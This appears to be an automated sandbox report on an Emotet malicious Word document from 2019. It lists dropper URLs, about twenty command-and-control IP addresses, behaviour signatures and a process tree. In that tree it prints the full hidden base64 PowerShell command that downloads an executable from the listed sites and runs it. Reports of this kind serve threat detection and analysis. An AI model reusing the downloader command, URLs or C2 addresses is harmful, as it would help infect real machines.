Analysis

  • max time kernel: 140s
  • resource: win7v191014
  • submitted: 17-12-2019 13:56

General

  • Target: Docs_fbff465d66a0eb834b052719a27f5ab1.34
  • Sample: 191217-l96nd1vmds
  • SHA256: 6568a3a8206a6474f34f2f1d7a2951653070f60517ef2fb92c47d005bc4f7fbe

Score
10/10

Malware Config

Extracted

  • Language: ps1
  • Source: URLs
  • exe.dropper:
    http://nangngucsiam.com/wp-content/plugins/wp-ffpc/4ij33/
    http://jsd-id.com/wp-content/uploads/4ae3ep99933/
    http://18teens.xyz/wp-content/epewe862/
    http://www.fundzit.com/wp-admin/g05/
    http://wp.banyannaples.com/cgi-bin/97sq9667/

Extracted

  • Family: emotet
  • C2:
    152.170.108.99:443
    99.252.27.6:80
    93.148.252.90:80
    96.126.121.64:443
    104.236.137.72:8080
    85.234.143.94:8080
    80.85.87.122:8080
    2.139.158.136:443
    80.11.158.65:8080
    79.31.85.103:80
    77.55.211.77:8080
    96.61.113.203:80
    181.198.203.45:443
    142.93.114.137:8080
    186.15.83.52:8080
    181.36.42.205:443
    68.183.190.199:8080
    159.203.204.126:8080
    50.28.51.143:8080
    46.101.212.195:8080
  • rsa_pubkey.plain

Signatures

  • Suspicious use of WriteProcessMemory 3 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Executes dropped EXE 4 IoCs
  • Suspicious behavior: EmotetMutantsSpam 2 IoCs
  • Modifies registry class 144 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Drops file in System32 directory 6 IoCs

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Docs_fbff465d66a0eb834b052719a27f5ab1.34.doc"
    1⤵
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious behavior: AddClipboardFormatListener
    • Drops file in System32 directory
    PID:2012
  • C:\Windows\SYSTEM32\WISPTIS.EXE
    /QuitInfo:0000000000000614;0000000000000654;
    1⤵
    • Suspicious use of SetWindowsHookEx
    PID:1104
  • C:\Windows\SYSTEM32\WISPTIS.EXE
    /QuitInfo:0000000000000614;0000000000000654;
    1⤵
    • Suspicious use of SetWindowsHookEx
    PID:1124
  • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
    Powershell -w hidden -en JABSAHoAeQBuAGgAcQBnAHcAdAB5AD0AJwBVAHcAZABkAGEAbgBxAG4AaQByAGgAdQAnADsAJABJAHoAdwBzAHIAawBzAGcAdgBkAGMAZwAgAD0AIAAnADYANwAnADsAJABPAGkAZwBiAGcAegB1AGwAPQAnAEQAdwBtAG0AbQBmAHkAegB6AHEAdgBkAHMAJwA7ACQAVQBlAGsAZABuAG4AZABjAGgAdwByAGUAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEkAegB3AHMAcgBrAHMAZwB2AGQAYwBnACsAJwAuAGUAeABlACcAOwAkAFAAYQBhAHoAcgBlAGwAcwBwAHMAbgA9ACcATQB0AHoAbAB2AGYAdwByAGQAYgB2AGwAagAnADsAJABaAHkAagBzAHEAdgB2AHUAYQB2AHoAaQBlAD0ALgAoACcAbgBlAHcALQBvACcAKwAnAGIAagAnACsAJwBlAGMAdAAnACkAIABOAEUAVAAuAHcARQBCAEMATABJAEUAbgBUADsAJABJAGsAYgBhAGUAYwBnAGcAeQA9ACcAaAB0AHQAcAA6AC8ALwBuAGEAbgBnAG4AZwB1AGMAcwBpAGEAbQAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHAAbAB1AGcAaQBuAHMALwB3AHAALQBmAGYAcABjAC8ANABpAGoAMwAzAC8AKgBoAHQAdABwADoALwAvAGoAcwBkAC0AaQBkAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AdQBwAGwAbwBhAGQAcwAvADQAYQBlADMAZQBwADkAOQA5ADMAMwAvACoAaAB0AHQAcAA6AC8ALwAxADgAdABlAGUAbgBzAC4AeAB5AHoALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AZQBwAGUAdwBlADgANgAyAC8AKgBoAHQAdABwADoALwAvAHcAdwB3AC4AZgB1AG4AZAB6AGkAdAAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AZwAwADUALwAqAGgAdAB0AHAAOgAvAC8AdwBwAC4AYgBhAG4AeQBhAG4AbgBhAHAAbABlAHMALgBjAG8AbQAvAGMAZwBpAC0AYgBpAG4ALwA5ADcAcwBxADkANgA2ADcALwAnAC4AIgBTAFAAYABsAGkAVAAiACgAJwAqACcAKQA7ACQAWgBmAGsAcQBkAG4AcgB5AD0AJwBRAHUAcwBlAHgAdQB5AHMAYQBtACcAOwBmAG8AcgBlAGEAYwBoACgAJABaAHIAcwB0AGcAcQByAGUAbQB0ACAAaQBuACAAJABJAGsAYgBhAGUAYwBnAGcAeQApAHsAdAByAHkAewAkAFoAeQBqAHMAcQB2AHYAdQBhAHYAegBpAGUALgAiAEQATwB3AG4AbABgAE8AYABBAEQARgBpAEwAZQAiACgAJABaAHIAcwB0AGcAcQByAGUAbQB0ACwAIAAkAFUAZQBrAGQAbgBuAGQAYwBoAHcAcgBlACkAOwAkAEsAaABtAGcAdwBsAHoAZQBuAGkAagA9ACcASgBoAHgAagBrAHYAdgBmAHoAZgBsAGUAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtAEkAdABlACcAKwAnAG0AJwApACAAJABVAGUAawBkAG4AbgBkAGMAaAB3AHIAZQApAC4AIgBsAGUAYABOAEcAVABIACIAIAAtAGcAZQAgADMAMAAwADAAMgApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAHQAYQBgAFIAVAAiACgAJABVAGUAawBkAG4AbgBkAGMAaAB3AHIAZQApADsAJABYAHQAaQBpAHcAagB2AGQAZQA9ACcARgB5AHAAeQBoAGwAagBtAG4AbQBiACcAOwBiAHIAZQBhAGsAOwAkAFEAawBrAGwAYwBhAGIAagBmAHMAaAA9ACcAQQBtAGkAbwBlAHQAbAB1AHEAdwBxAGIAeAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABBAHMAdQB2AGoAcwByAGwAeQBqAGEAZAA9ACcAQQBnAGgAZABpAGsAdwBkAHoAJwA=
    1⤵
    • Suspicious use of WriteProcessMemory
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious behavior: EnumeratesProcesses
    • Drops file in System32 directory
    PID:2004
    • C:\Users\Admin\67.exe
      "C:\Users\Admin\67.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      • Suspicious use of SetWindowsHookEx
      • Executes dropped EXE
      PID:2076
      • C:\Users\Admin\67.exe
        --4e61eeeb
        3⤵
        • Suspicious use of SetWindowsHookEx
        • Executes dropped EXE
        • Suspicious behavior: EmotetMutantsSpam
        • Drops file in System32 directory
        PID:2100
  • C:\Windows\SysWOW64\acquireshades.exe
    "C:\Windows\SysWOW64\acquireshades.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    • Suspicious use of SetWindowsHookEx
    • Executes dropped EXE
    PID:2156
    • C:\Windows\SysWOW64\acquireshades.exe
      --2f227d2
      2⤵
      • Suspicious use of SetWindowsHookEx
      • Suspicious behavior: EnumeratesProcesses
      • Executes dropped EXE
      • Suspicious behavior: EmotetMutantsSpam
      • Drops file in System32 directory
      PID:2172

Downloads

  • memory/2012-0-0x00000000061D0000-0x00000000061D4000-memory.dmp
    Filesize: 16KB
  • memory/2012-2-0x00000000094F0000-0x00000000094F4000-memory.dmp
    Filesize: 16KB
  • memory/2012-1-0x0000000006317000-0x000000000631B000-memory.dmp
    Filesize: 16KB
  • memory/2076-9-0x0000000000240000-0x0000000000257000-memory.dmp
    Filesize: 92KB
  • memory/2100-12-0x0000000000360000-0x0000000000377000-memory.dmp
    Filesize: 92KB
  • memory/2100-13-0x0000000000400000-0x0000000000457000-memory.dmp
    Filesize: 348KB
  • memory/2156-15-0x0000000000280000-0x0000000000297000-memory.dmp
    Filesize: 92KB
  • memory/2172-17-0x00000000002D0000-0x00000000002E7000-memory.dmp
    Filesize: 92KB
  • memory/2172-18-0x0000000000400000-0x0000000000457000-memory.dmp
    Filesize: 348KB